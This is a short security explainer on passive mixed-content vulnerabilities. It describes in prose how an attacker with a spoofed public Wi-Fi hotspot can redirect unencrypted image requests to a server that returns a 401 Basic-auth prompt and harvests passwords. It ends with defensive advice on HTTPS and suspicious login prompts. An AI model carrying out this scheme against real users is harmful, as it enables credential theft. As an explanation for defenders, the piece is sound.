If a particular browser’s image parsing process is vulnerable, a highly sophisticated attacker can deliver a specially crafted, malformed file using a passive mixed content vulnerability. In this case, the delivery method is incidental, and the vulnerability lies with the client, rather than the server. This attack requires advanced intelligence about the specific target’s browser, and an un-patched or unreported vulnerability in that specific browser, so the threat is negligible.
However, there is an attack scenario that requires little technical sophistication, yet may result in a complete account takeover. First, assume the attacker has established a privileged position in the network by spoofing a public Wi-Fi access point. The attacker can now return any response to non-encrypted requests coming over the air. From this position, the attacker can return a 302 “Found” temporary redirect to a non-encrypted request for the passive content on the target site. The location header for this request is a resource under their control, configured to respond with a 401 “Unauthorized” response containing a WWW-Authenticate header with a value of Basic realm=”Please confirm your credentials.” The user’s browser will halt loading the page and display an authentication prompt. Some percentage of users will inevitably enter their credentials, which will be submitted directly to the attacker. Even worse, this attack can be automated and generalized to such a degree that an attacker could use commodity hardware to set up a fake Wi-Fi hotspot in a public place and harvest passwords from any number of sites.

Protecting against this attack is relatively simple. For users, be very suspicious of any unexpected login prompts, especially if it doesn’t look like part of the website. For developers, source in all resources using HTTPS on every secure page.